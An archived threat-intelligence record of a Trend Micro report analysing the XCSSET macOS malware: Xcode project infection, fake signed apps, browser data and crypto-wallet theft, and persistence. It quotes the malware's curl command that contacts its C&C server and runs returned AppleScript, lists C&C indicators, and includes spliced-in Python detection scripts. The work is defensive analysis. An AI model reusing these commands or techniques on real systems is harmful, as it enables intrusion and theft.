{
	"id": "d08b19b0-90c3-40ba-9306-f392e2d4372f",
	"created_at": "2026-04-06T00:15:16.823843Z",
	"updated_at": "2026-04-10T03:36:47.745595Z",
	"deleted_at": null,
	"sha1_hash": "09647e43e994defb7e03b2fa2c4f6f9f51e08f2c",
	"title": "XCSSET Quickly Adapts to macOS 11 and M1 based Macs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1641511,
	"plain_text": "XCSSET Quickly Adapts to macOS 11 and M1 based Macs\r\nBy Steven Du, Dechao Zhao, Luis Magisa, Ariel Neimond Lazaro\r\nPublished: 2021-04-16 · Archived: 2026-04-05 21:31:33 UTC\r\nThis latest update details our new research on XCSSET, including the ways in which it has adapted itself to work on both ARM64 and x86_64 Macs.\r\nLast year, we first found XCSSET, which targeted Mac users by infecting Xcode projects. Initially reported as a malware family, in light of our recent findings it is now classified as an ongoing campaign. This latest update details our new research regarding XCSSET, including the ways in which it has adapted itself to work on both ARM64 and x86_64 Macs, as well as other notable payload changes.\r\nIn our first blog post and technical brief on XCSSET, we discussed at length the dangers it posed to Xcode developers and how it exploited two macOS vulnerabilities to maximize what it can take from an infected machine. Our follow-up update covered the third exploit we found, which abuses other popular macOS browsers to plant a Universal Cross-site Scripting (UXSS) injection.\r\nBig changes for macOS 11 Big Sur\r\nLast November, Apple released macOS 11 Big Sur alongside new Macs equipped with ARM-based M1 processors. Software built for x86_64 can still run on those machines with the help of Rosetta 2, the binary translation layer built into Big Sur, but most developers will prefer to update their software to support ARM64 natively.\r\nAccording to Kaspersky, new samples of the malware were discovered that can run on Macs with the new M1 chip. 
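The check below, added here as example code rather than anything taken from the report or from XCSSET itself, reads a Mach-O header to list the architectures a downloaded sample contains, so a triage script can separate a universal x86_64/ARM64 build from an x86_64-only one that would need Rosetta 2 on an M1 Mac. The two header images it parses are constructed for the example and are not real samples; the CPU type constants are the values from Apple's mach/machine.h.\r\n

```python
import struct

FAT_MAGIC = 0xCAFEBABE      # universal (fat) header; always stored big-endian
MH_MAGIC_64 = 0xFEEDFACF    # thin 64-bit Mach-O header, stored in host byte order
MH_MAGIC = 0xFEEDFACE       # thin 32-bit Mach-O header

# cputype values from mach/machine.h; 0x01000000 is the CPU_ARCH_ABI64 flag
CPU_NAMES = {
    0x00000007: 'i386',
    0x01000007: 'x86_64',
    0x0000000C: 'arm',
    0x0100000C: 'arm64',
}


def mach_o_archs(data):
    '''List the CPU architectures in a Mach-O image, or [] if data is not Mach-O.'''
    if len(data) < 8:
        return []
    magic_be = struct.unpack('>I', data[:4])[0]
    if magic_be == FAT_MAGIC:
        nfat = struct.unpack('>I', data[4:8])[0]
        # Java class files share the CAFEBABE magic; their next 32 bits hold the
        # class-file version, far larger than any plausible architecture count.
        if nfat == 0 or nfat > 32:
            return []
        archs = []
        for i in range(nfat):
            entry = data[8 + 20 * i:28 + 20 * i]   # struct fat_arch is 20 bytes
            if len(entry) < 20:
                break
            cputype = struct.unpack('>I', entry[:4])[0]
            archs.append(CPU_NAMES.get(cputype, 'cpu_0x%08x' % cputype))
        return archs
    # Thin images: x86 and arm hosts write the header little-endian, so the magic
    # appears on disk as CF FA ED FE; the big-endian form is accepted as well.
    for order in ('<', '>'):
        magic = struct.unpack(order + 'I', data[:4])[0]
        if magic in (MH_MAGIC_64, MH_MAGIC):
            cputype = struct.unpack(order + 'I', data[4:8])[0]
            return [CPU_NAMES.get(cputype, 'cpu_0x%08x' % cputype)]
    return []


def describe(data):
    '''One-line triage verdict: which slices are present and whether M1 needs Rosetta 2.'''
    archs = mach_o_archs(data)
    if not archs:
        return 'not a Mach-O image'
    kind = 'universal' if len(archs) > 1 else 'thin'
    note = '' if 'arm64' in archs else ' (no arm64 slice: cannot run natively on M1)'
    return '%s: %s%s' % (kind, ', '.join(archs), note)


# Constructed header images (not real XCSSET samples): a fat header declaring an
# x86_64 slice and an arm64 slice, the first 32 bytes of a thin x86_64 image,
# and the start of a Java class file that must not be mistaken for a fat binary.
FAT_SAMPLE = bytes.fromhex(
    'cafebabe 00000002'
    '01000007 00000003 00004000 00010000 0000000e'
    '0100000c 00000000 00020000 00010000 0000000e')
THIN_X86_64_SAMPLE = bytes.fromhex(
    'cffaedfe 07000001 03000000 02000000 10000000 00040000 85002000 00000000')
JAVA_CLASS_SAMPLE = bytes.fromhex('cafebabe 00000034 00100a00')

if __name__ == '__main__':
    for label, image in (('fat', FAT_SAMPLE), ('thin', THIN_X86_64_SAMPLE), ('class', JAVA_CLASS_SAMPLE)):
        print(label, describe(image))
```

On a real file, pass the first few hundred bytes of the sample to describe(); the header walk is the same one file(1) and lipo -archs perform, but doing it in a script lets a triage job record a verdict for every file pulled from the C\u0026C server at once.\r\n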
We checked the binary files downloaded from the command and control (C\u0026C) server and found that nearly all of them were universal binaries containing both x86_64 and ARM64 slices, save for three that had only an x86_64 slice. Besides adding support for the M1 chip, the XCSSET malware has taken other steps to fit macOS 11 Big Sur as well.\r\nAs mentioned in our first technical brief, this malware leverages the development version of Safari to load malicious Safari frameworks and related JavaScript backdoors from its C\u0026C server. It hosts Safari update packages on the C\u0026C server, then downloads and installs the package matching the user's OS version. To adapt to the newly released Big Sur, new packages for “Safari 14” were added (Figure 1). As we observed in safari_remote.applescript, it downloads the corresponding Safari package according to the user's current browser and OS versions (Figure 2).\r\nFigure 1. Safari 14 packages\r\nhttps://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html\r\nPage 1 of 10\r\nFigure 2. safari_remote.applescript\r\nImitation apps for Big Sur are also created from malicious AppleScript files: icon files are downloaded from a C\u0026C server, then each fake app's Info.plist is modified so that its icon is convincingly disguised as that of the legitimate app it imitates.\r\nThe malware's newer modules, such as icons.php, adjust the icons to fit the victim's OS (Figure 5). For example, the fake Finder icon for macOS 10.15 and lower is a downloaded file named Finder.icns with square corners (Figure 3), whereas on macOS 11.1 the downloaded file is FinderBigSur.icns, with the rounded corners used in Big Sur (Figure 4).\r\nFigure 3. Finder Icon (10.15)\r\nFigure 4. Finder Icon (11.1)\r\nFigure 5. 
The calling icons.php script\r\nGetting past macOS 11's security features\r\nFrom macOS 11 Big Sur beta 6 onwards, Apple silicon Macs enforce a new requirement intended to catch code modification: a native ARM64 executable must carry a code signature before the kernel will run it, although a simple ad-hoc signature (one with no developer identity behind it) suffices. The requirement does not apply to translated x86_64 binaries running under Rosetta 2, nor to macOS 11 running on Intel hardware.\r\nIn all AppleScript modules, a new launchApp function is now used instead of the open command to execute a fake app built from malicious AppleScript (Figure 6).\r\nFigure 6. The launchApp calling function\r\nAs its source code shows, the malware meets macOS 11's new policy with the minimum it demands rather than defeating it: its fake apps and files are ad-hoc signed with the command codesign --force --deep -s -. The malware then downloads its own open tool from its C\u0026C server, which arrives already ad-hoc signed; on macOS 10.15 and lower it still uses the system's built-in open command to run the apps.\r\nThe main routine of the open tool is as follows:\r\n1. Require an app bundle as argument. For example: open xcode.app\r\n2. Launch {app bundle}/Contents/MacOS/applet\r\n3. If the wait parameter is included (for example: open xcode.app wait), launch {app bundle}/Contents/MacOS/applet and then poll until the applet disappears from the process list, using the following command: /bin/bash -c ps aux | grep -v grep | grep -ci '{app bundle}/Contents/macOS/applet' || echo 0 2\u003e\u00261 \u0026\u003e/dev/null\r\nInterestingly, even though the /usr/bin/open command works fine for fake apps on M1 systems, the malware still uses its own open tool.\r\nFigure 7. 
launchApp script\r\nOther features and payloads of XCSSET\r\nDays after we released our second technical brief on this malware, a new domain named \"trendmicronano[.]com\" was added to its C\u0026C server. Although it contains the keywords \"trend micro\", it has nothing to do with Trend Micro. So far, six active C\u0026C domains share the same IP address of 94[.]130[.]27[.]189:\r\nTitian[.]com\r\nFindmymacs[.]com\r\nStatsmag[.]com\r\nStatsmag[.]xyz\r\nAdoberelations[.]com\r\nTrendmicronano[.]com\r\nbootstrap.applescript\r\nThe bootstrap.applescript module, which is called by the Pods binary and contains the logic to call the other malicious AppleScript modules, has also undergone some noteworthy changes:\r\nMachines with the username \"apple_mac\", identified as physical M1 machines, are used to test whether new ARM-architecture Mach-O files work properly on M1 hardware (Figure 8)\r\nIt calls a new screen_sim module instead of the screen module (Figure 9)\r\nSupport for the Chromium browser was added (Figure 10)\r\nIn the previous version, the chrome_data and opera_data modules were only called when the language setting contains \"IN\" for India (Figure 11); in this latest iteration the chrome_data module is called along with the replicator module, and the call to opera_data has been commented out (Figure 12)\r\nFigure 8. Testing code for the bootstrap.applescript module\r\nFigure 9. New component of the bootstrap.applescript module\r\nFigure 10. The bootstrap.applescript module added support for a new browser\r\nFigure 11. The previous version of the bootstrap.applescript module\r\nFigure 12. 
The latest version calls the replicator module\r\nreplicator.applescript\r\nThe replicator.applescript module is responsible for injecting local Xcode projects with malicious code. We observed that this module uses more varied file names in this latest version compared to its predecessor. The file names now used by this module are as follows:\r\nScript file names:\r\nAssets.xcassets\r\nAsset.xcasset\r\nxcassets.folder\r\nbuild.file\r\nMach-O file name:\r\ncat\r\nThe replicator.applescript module infects Xcode developer projects by inserting a function that calls its malicious components during the build phase or through a build rule. In previous versions, the code snippets inserted into the build phase or build rule were assigned hard-coded IDs, but this latest iteration adds a function that generates random IDs. According to its logic (Figure 13), the random ID always ends with the postfix “AAC43A”, which is used to identify and remove the old infection snippet in preparation for a new infection (Figure 14). We were able to locate 10 public GitHub repositories infected with this malware, but all of them carried the old hard-coded IDs; repositories infected with the latest variant have yet to be found.\r\nOriginally, the script inserted into the build phase or build rule called a bash script file, which in turn referred to Mach-O binary files named “Pods” (Figure 15). In this latest version, the script calls a Mach-O binary file named “cat” directly, with the AUTO_CLEAN_PROJ variable, currently set to “false”, defined alongside the call (Figure 16).\r\nFigure 13. Random ID Generator\r\nFigure 14. Postfix use case\r\nFigure 15. The previous version of build phase script\r\nFigure 16. 
The latest version of build phase script\r\nagent.php\r\nIn our analysis of the latest JavaScript code from agent.php, which hosts much of the code used to handle requests that manipulate browsers, we also discovered that, unlike its previous version, the malware now tries to steal confidential data from the following sites:\r\n163.com\r\nHuobi\r\nbinance.com\r\nnncall.net\r\nEnvato\r\nlogin.live.com\r\nFor the cryptocurrency trading platform Huobi, the malware not only steals account information but can now replace the address in a user's cryptocurrency wallet, a feature that did not exist in the previous version (Figure 18).\r\nFigure 17. Stealing Envato account information\r\nFigure 18. Replacing Huobi wallet addresses\r\nNew Findings on the Landing Mach-O File\r\nAs discussed above, nearly all the binary files downloaded directly from the C\u0026C server have changed from x86_64-only Mach-O files to universal binaries with both x86_64 and ARM64 slices, with three notable exceptions: “cat” and “Pods” are the landing Mach-O binaries triggered by infected Xcode projects, while “open” is used to execute all fake apps compiled from malicious AppleScript files. Upon further investigation, we found out why these were not updated to support ARM64:\r\nThe cat Mach-O binary file is generated by the Shell Script Compiler (shc), an open-source tool that turns an input shell script into a native executable: it embeds the script, encrypted, in a small C program that decrypts it at run time and hands it to the shell, so the script itself is never stored in the clear on disk. 
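Because cat and Pods are launched from the build phase or build rule that replicator.applescript injects, the quickest check on a developer machine is to scan every project.pbxproj for such phases. The scanner below is added example code (not from the report and not XCSSET's own code); the project fragment it scans is constructed for the example, and the markers it looks for are taken from the description above (the AUTO_CLEAN_PROJ variable, a binary named cat or Pods invoked by path, one of the dropped script file names, an object ID ending in AAC43A), not from a captured infected project.\r\n

```python
import re
import sys
from dataclasses import dataclass, field

DQ = chr(34)   # the double-quote character; pbxproj wraps script values in it

# An object in project.pbxproj starts with a 24-hex-digit ID, a /* name */ comment
# and an opening brace; its body runs to the next closing brace.
OBJECT_HEADER = re.compile(r'([0-9A-F]{24}) /[*] ([^*]*?) [*]/ = [{]')
ISA = re.compile(r'isa = (PBX[A-Za-z]+);')
# PBXShellScriptBuildPhase stores the script in shellScript, PBXBuildRule in script
SCRIPT_VALUE = re.compile(r'(?:shellScript|script) = ' + DQ + r'(.*?)' + DQ + r';', re.S)

SCRIPT_ISAS = ('PBXShellScriptBuildPhase', 'PBXBuildRule')
ID_POSTFIX = 'AAC43A'   # replicator.applescript appends this to every generated ID
MARKERS = {
    # the variable the injected phase defines alongside the call to cat
    'auto_clean_var': re.compile(r'AUTO_CLEAN_PROJ='),
    # a dropped file invoked as a path: /cat or /Pods at the end of a command, or
    # one of the script file names used as an executable. The ordinary cat command
    # and a Pods/ directory (as CocoaPods uses) do not match.
    'dropper_path': re.compile(
        r'/(cat|Pods|Assets[.]xcassets|Asset[.]xcasset|xcassets[.]folder|build[.]file)'
        r'(?=[ ;' + DQ + r']|$)', re.M),
}


@dataclass
class Finding:
    object_id: str
    name: str
    isa: str
    indicators: list = field(default_factory=list)


def scan_pbxproj(text):
    '''Return a Finding for each script build phase or build rule carrying an XCSSET marker.'''
    findings = []
    for header in OBJECT_HEADER.finditer(text):
        end = text.find('};', header.end())
        body = text[header.end():end if end != -1 else len(text)]
        isa = ISA.search(body)
        if not isa or isa.group(1) not in SCRIPT_ISAS:
            continue
        indicators = []
        if header.group(1).endswith(ID_POSTFIX):
            indicators.append('id_postfix_' + ID_POSTFIX)
        script_match = SCRIPT_VALUE.search(body)
        script = script_match.group(1) if script_match else ''
        for label, pattern in MARKERS.items():
            if pattern.search(script):
                indicators.append(label)
        if indicators:
            findings.append(Finding(header.group(1), header.group(2), isa.group(1), indicators))
    return findings


def scan_file(path):
    with open(path, encoding='utf-8', errors='replace') as fh:
        return scan_pbxproj(fh.read())


# Constructed project fragment (not a real infected project): one clean Sources
# phase, one phase written the way the report describes the latest replicator
# output, and one ordinary CocoaPods phase that must not be flagged.
SAMPLE_PBXPROJ = '''
{
    objects = {
        0A1B2C3D4E5F60718293A4B5 /* Sources */ = {
            isa = PBXSourcesBuildPhase;
            files = (
            );
        };
        1A2B3C4D5E6F708192AAC43A /* ShellScript */ = {
            isa = PBXShellScriptBuildPhase;
            files = (
            );
            shellPath = /bin/sh;
            shellScript = %AUTO_CLEAN_PROJ=false ${SRCROOT}/xcassets.folder/cat%;
        };
        ABCDEF0123456789ABCDEF01 /* [CP] Embed Pods Frameworks */ = {
            isa = PBXShellScriptBuildPhase;
            shellPath = /bin/sh;
            shellScript = %${PODS_ROOT}/Target Support Files/Pods/Pods-frameworks.sh%;
        };
    };
}
'''.replace('%', DQ)

if __name__ == '__main__':
    paths = sys.argv[1:]
    results = [f for p in paths for f in scan_file(p)] if paths else scan_pbxproj(SAMPLE_PBXPROJ)
    for f in results:
        print(f.object_id, f.isa, f.name, ', '.join(f.indicators))
```

Point it at every project.pbxproj under a source tree (python3 scan.py path/to/project.pbxproj ...). A hit on the ID postfix alone is worth a look even without the other markers, since replicator.applescript relies on that postfix to find its own earlier snippet. The cat binary such a phase launches is, as described above, a wrapper produced by shc.\r\n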
The shc source code is on GitHub, and it installs easily with local package managers such as Homebrew on macOS or YUM and apt-get on Linux. Although a tool called UnShc can decompile binaries generated by shc, it does not work well on files from the latest version of shc.\r\nBecause of this, we still had to examine the payload of cat using proper debugging methods (an shc wrapper must decrypt the script in memory before passing it to the shell, which a debugger can catch). First, we obtained a decrypted shell script from cat, whose main payload downloads and executes another Mach-O binary, Pods, from the C\u0026C server (Figure 19). Pods, likewise generated by shc, has the same file size as cat, and we used the same debugging method to recover its decrypted shell script.\r\nFigure 19. The “cat” Mach-O binary file\r\nOnce decrypted, the shell script from Pods turned out to be fairly involved. It:\r\n1. Connects to https://$TARGET_DOMAIN/apple/prepod.php in an attempt to get a remote command. The expected return value is an AppleScript string; if it is not empty, osascript -e is called to execute it. So far, the return value has been empty.\r\n2. Reads $HOME/Library/Caches/GameKit/.report and, if the file exists, uses its contents as the target directory. Otherwise, it randomly selects a path from the following:\r\n\"$HOME/Library/Application Support/iCloud\"\r\n\"$HOME/Library/Application Scripts/com.apple.AddressBook.Shared\"\r\n\"$HOME/Library/Group Containers/group.com.apple.notes\"\r\n\"$HOME/Library/Containers/com.apple.routerd\"\r\n3. Reads $HOME/Library/Caches/GameKit/.plist and, if the file exists, uses its contents as the path of the plist file for a persistent item. 
Otherwise, it randomly selects a path from the following:\r\n\"$HOME/Library/LaunchAgents/com.apple.net.core.plist\"\r\n\"$HOME/Library/LaunchAgents/com.apple.auditor.plist\"\r\n\"$HOME/Library/LaunchAgents/com.google.keystone.plist\"\r\n\"$HOME/Library/LaunchAgents/com.google.keystone.plist\"\r\n4. Uses macOS's osacompile command to compile embedded AppleScript (Figure 20) into a fake Xcode.app. The embedded AppleScript contains encrypted strings that make it hard to read, but after decrypting them we found its main payload:\r\n    4.1. Sends an HTTP request to com.php by executing the command curl -sk -d 'user=\u003cusername\u003e\u0026build_vendor=default\u0026build_version=default' https://\u003cdomainname\u003e/apple/com.php, which returns the content of a new AppleScript file. Based on this, we believe it to be bootstrap.applescript.\r\n    4.2. Uses the osacompile -x command to compile the AppleScript content returned by the curl command into a run-only AppleScript, then executes it.\r\n5. Creates the file $HOME/Library/Caches/GameKit/AppleKit and writes into it the path of Xcode.app's main Mach-O file (Contents/MacOS/applet).\r\n6. Creates the file $TARGET_PLIST_FILE, a launch agent that runs $HOME/Library/Caches/GameKit/AppleKit, then calls launchctl load on it so that AppleKit is executed and in turn launches the fake Xcode.app.\r\n7. Writes the following files:\r\n\"$HOME/Library/Caches/GameKit/.report\" – “$TARGETDIR/Xcode.app”, the fake app compiled by the malware\r\n\"$HOME/Library/Caches/GameKit/.plist\" – “$TARGET_PLIST_FILE”, the persistence entry created by the malware\r\n\"$HOME/Library/Caches/GameKit/.domain\" – the domain used by the malware\r\n8. Finally, an interesting function in the shell script is clean_proj (Figure 21), which is used to disinfect the currently infected Xcode project. 
The calling condition of clean_proj is “$AUTOCLEAN=true” (Figure 22), but as mentioned earlier, the variable's value is currently false, so clean_proj is not called in the current build.\r\nFigure 20. Embedded AppleScript code\r\nFigure 21. Clean_proj for disinfection\r\nFigure 22. Disinfect only when AUTOCLEAN is true\r\nTrend Micro Solutions\r\nTo protect systems from this type of threat, users should only download apps from official and legitimate marketplaces. Users can also consider multilayered security solutions such as Trend Micro Antivirus for Mac and Trend Micro Maximum Security, which provide comprehensive security and multidevice protection against cyberthreats. Enterprises can take advantage of Trend Micro's Smart Protection Suites with XGen™ security, which infuses high-fidelity machine learning into a blend of threat protection techniques to eliminate security gaps across any user activity or endpoint.\r\nIndicators of Compromise\r\nFilename SHA256 Trend Micro Detection Name\r\nreplicator.applescript 3631d9485d2e61bb86a71a007d5420d132938cc1f9dacbc6d2eef0dcd8dc040c Trojan.macOS.XCSSET\r\nsafari_remote.applescript 5acf6821d44545bfcd3446e2bdf589bc16972f76cc9137cb364954829df520d2 Trojan.macOS.XCSSET\r\npods_infect.applescript 66057e5672a0e3c564563f99881fc57b604e6c91a992b6a937d0077636200497 Trojan.macOS.XCSSET\r\ncat 74df6fee1c5d18dc8f0dad1263199ab4392088fd5faaae95ae05b377207fff05 TrojanSpy.macOS.XCSS\r\nscreen_sim.applescript 86f3195ea91953e0e560ac474e34218a919c89ba433dc3a1eb935800b2acb7f7 Trojan.macOS.XCSSET\r\nPods shellscript 8aaf02565161bd88f033d2419104a4cb452a4808363b05cdff43b5781f78e01d Trojan.SH.XCSSET.B\r\nPods a018213ac9202119eb7a6d58603f8dbb2fdde26b9639d852e5e426ecbfc3545f TrojanSpy.macOS.XCSS\r\ncat shellscript a191c9657abbc528640bd2217f479fbecb33c85ca0e37a2ea309225bb0cbf2ce Trojan.SH.XCSSET.B\r\nbootstrap.applescript 
cdbc86b5828fc6e8f9747bbd298bdf19d0047622c9e69f9b0877ee4106b3768 Trojan.macOS.XCSSET\r\nIP/Domain Category\r\n94[.]130[.]27[.]189 C\u0026C Server\r\nAdoberelations[.]com C\u0026C Server\r\nFindmymacs[.]com C\u0026C Server\r\nStatsmag[.]com C\u0026C Server\r\nStatsmag[.]xyz C\u0026C Server\r\nTitian[.]com C\u0026C Server\r\nTrendmicronano[.]com C\u0026C Server\r\nSource: https://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html"
	],
	"report_names": [
		"xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434516,
	"ts_updated_at": 1775792207,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/09647e43e994defb7e03b2fa2c4f6f9f51e08f2c.pdf",
		"text": "https://archive.orkl.eu/09647e43e994defb7e03b2fa2c4f6f9f51e08f2c.txt",
		"img": "https://archive.orkl.eu/09647e43e994defb7e03b2fa2c4f6f9f51e08f2c.jpg"
	}
}